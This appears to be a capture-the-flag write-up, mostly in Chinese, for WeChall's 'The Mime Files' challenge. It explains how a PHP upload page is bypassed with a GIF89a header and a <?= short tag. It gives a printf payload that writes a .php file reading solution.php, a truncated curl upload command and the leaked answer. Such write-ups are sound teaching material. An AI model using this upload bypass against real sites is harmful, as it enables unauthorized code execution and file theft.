WeChall - The Mime Files
Challenge
The Mime Files (Exploit)
Hello Hacker, As you know, i am constantly developing great new websites. But this time, i am puzzled... Somehow, hackers broke into my new site "The Mime Files" and read the contents of solution.php. OUCH! Can you help me to find the vulnerability?
Source Code Analysis
Web app at https://themimefiles.warchall.net/
是一个文件上传站点。
lib/upload.php — 核心上传逻辑:
1 | function uploadFile(array $file) |
Vulnerabilities
1. MIME 类型绕过: mime_content_type()
会根据文件头判断类型。添加 GIF 头可使文件被识别为
image/gif。
2. PHP 代码检测绕过:
stripos($data, '<?php') 只检测 <?php
字面串。使用 PHP 短标签 <?= 即可绕过 — 它完全不含 "php"
字符串。作者注释 # This does not seem to help :/
也暗示了这个绕过。
3. 文件扩展名白嫖: 没有扩展名过滤,可直接上传
.php 文件。
Exploit
构造 payload 文件:
1 | printf 'GIF89a<?= file_get_contents("../solution.php") ?>' > shell.php |
GIF89a 头 → MIME check 通过 (image/gif)
<?= 短标签 → PHP 检测绕过 .php 后缀 →
Apache 以 PHP 执行
上传并访问:
1 | curl -b "PHPSESSID=xxx" \ |
返回:GIF89a<?php\n// GoodyearGoodeveGooday